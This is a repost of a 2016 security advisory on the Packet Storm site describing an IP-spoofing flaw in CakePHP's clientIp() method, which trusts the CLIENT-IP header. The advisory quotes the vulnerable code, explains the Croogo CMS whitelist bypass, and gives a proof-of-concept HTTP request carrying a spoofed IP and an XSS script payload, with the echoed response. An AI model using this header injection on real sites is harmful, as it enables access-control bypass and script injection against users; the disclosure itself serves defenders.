Twenty Year Anniversary

CakePHP Framework 3.2.4 IP Spoofing

CakePHP Framework 3.2.4 IP Spoofing
Posted May 14, 2016
Authored by Dawid Golunski

CakePHP Framework versions 3.2.4 and below suffer from a vulnerability that allows users to spoof the source IP address logged by the server.

tags | exploit, spoof
MD5 | e42211c031063b646edfbfdecb046f33

CakePHP Framework 3.2.4 IP Spoofing

Change Mirror Download
http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt


=============================================
- Release date: 12.05.2016
- Discovered by: Dawid Golunski
- Severity: Medium
=============================================


I. VULNERABILITY
-------------------------

CakePHP Framework <= 3.2.4 IP Spoofing Vulnerability
3.1.11
2.8.1
2.7.10
2.6.12

II. BACKGROUND
-------------------------

- CakePHP Framework

http://cakephp.org/

"CakePHP makes building web applications simpler, faster and require less code.

CakePHP is a modern PHP 5.4+ framework with a flexible Database access layer
and a powerful scaffolding system that makes building both small and complex
systems a breeze. "


III. INTRODUCTION
-------------------------

CakePHP Framework contains a vulnerability that allows to spoof the source IP
address. This can allow to bypass access control lists, or injection of
malicious data which, if treated as sanitized by an unaware CakePHP-based
application, can lead to other vulnerabilities such as SQL injection, XSS,
command injection etc.


IV. DESCRIPTION
-------------------------

Both branches of CakePHP Framework (2.x, 3.x) contain a clientIp() method that
allows to obtain the IP address of a client accessing a CakePHP-based
application. The is slightly different in each branch:

CakePHP 2.x:

------[ Cake/Network/CakeRequest.php ]------

public function clientIp($safe = true) {
if (!$safe && env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '',
env('HTTP_X_FORWARDED_FOR'));
} else {
if (env('HTTP_CLIENT_IP')) {
$ipaddr = env('HTTP_CLIENT_IP');
} else {
$ipaddr = env('REMOTE_ADDR');
}
}

if (env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = env('HTTP_CLIENTADDRESS');

if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/',
'', $tmpipaddr);
}
}
return trim($ipaddr);
}

--------------------------------------------


CakePHP 3.x:

------[ cakephp/src/Network/Request.php ]------

/**
* Get the IP the client is using, or says they are using.
*
* @return string The client IP.
*/
public function clientIp()
{
if ($this->trustProxy && $this->env('HTTP_X_FORWARDED_FOR')) {
$ipaddr = preg_replace('/(?:,.*)/', '',
$this->env('HTTP_X_FORWARDED_FOR'));
} else {
if ($this->env('HTTP_CLIENT_IP')) {
$ipaddr = $this->env('HTTP_CLIENT_IP');
} else {
$ipaddr = $this->env('REMOTE_ADDR');
}
}

if ($this->env('HTTP_CLIENTADDRESS')) {
$tmpipaddr = $this->env('HTTP_CLIENTADDRESS');

if (!empty($tmpipaddr)) {
$ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr);
}
}
return trim($ipaddr);
}

--------------------------------------------


Both of the methods contain the same vulnerability. Despite the safe flag
(CakePHP 2.x), and trustyProxy flag (CakePHP 3.x) set to off by default, they
both use HTTP_CLIENT_IP request header (if it exists) instead of the
REMOTE_ADDR variable set by the web server.

The HTTP_CLIENT_IP header can easily be spoofed by sending CLIENT-IP header
in a HTTP request.


V. PROOF OF CONCEPT EXPLOIT
-------------------------


A) Simple PoC

Download a vulnerable version of CakePHP framework and edit
src/Template/Pages/home.ctp to include the PoC code below
which echoes the visitor's IP using the clientIp() method:


-------[ src/Template/Pages/home.ctp ]--------

<?php

[...]

use Cake\Cache\Cache;
use Cake\Core\Configure;
use Cake\Datasource\ConnectionManager;
use Cake\Error\Debugger;
use Cake\Network\Exception\NotFoundException;

$this->layout = false;

if (!Configure::read('debug')):
throw new NotFoundException();
endif;

$cakeDescription = 'CakePHP: the rapid development php framework';

echo "PoC \n<br> Your IP is: [". $this->request->clientIp() ."]\n\n<br><br>";

[...]

?>

----------------------------------------------


If we send the following request with CLIENT-IP header containing an arbitrary
IP and malicious XSS data:


GET /cake/cake3/ HTTP/1.1
Host: centos
CLIENT-IP: 100.200.300.400 <script>alert('poc');</script>
Content-Length: 2


the application will give the following response:


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

PoC
<br> Your IP is: [100.200.300.400 <script>alert('poc');</script>]

[...]


As we can see the clientIp() method returns the fake IP and XSS payload
from CLIENT-IP header.


B) Croogo CMS exploit

An example application vulnerable to this bug is Croogo CMS:

https://croogo.org/

"Croogo is a free, open source, content management system for PHP,
released under The MIT License. It is powered by CakePHP MVC framework.
It was first released on October 07, 2009"

In one of its scripts we can find the isWhitelistedRequest() which
takes care of ACLs:


-------[ Vendor/croogo/croogo/Croogo/Lib/CroogoRouter.php ]--------


/**
* Check wether request is from a whitelisted IP address
*
* @see CakeRequest::addDetector()
* @param $request CakeRequest Request object
* @return boolean True when request is from a whitelisted IP Address
*/
public static function isWhitelistedRequest(CakeRequest $request) {
if (!$request) {
return false;
}
$clientIp = $request->clientIp();
$whitelist = array_map(
'trim',
(array)explode(',', Configure::read('Site.ipWhitelist'))
);
return in_array($clientIp, $whitelist);
}

-------------------------------------------------------------------

As we can see, it uses the affected clientIp() function from CakePHP framework.


VI. BUSINESS IMPACT
-------------------------

This vulnerability could be used to bypass access control lists to get
access to sensitive data, or lead to higher severity vulnerabilities
if untrusted data returned by clientIp() method is treated as safe and used
without appropriate sanitization within SQL queries, system command calls etc.

VII. SYSTEMS AFFECTED
-------------------------

According to the vendor, the following versions of CakePHP framework should be
affected by this issue.

3.1.11
3.2.4
2.8.1
2.7.10
2.6.12


VIII. SOLUTION
-------------------------

The vendor has released patched versions.
Install the latest version from the link below.

IX. REFERENCES
-------------------------

http://legalhackers.com

http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt

Vendor security CakePHP releases:
http://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html

http://book.cakephp.org/3.0/en/controllers/request-response.html#working-with-http-methods-headers


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com

XI. REVISION HISTORY
-------------------------

12.05.2016 - Final advisory released

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    9 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    34 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close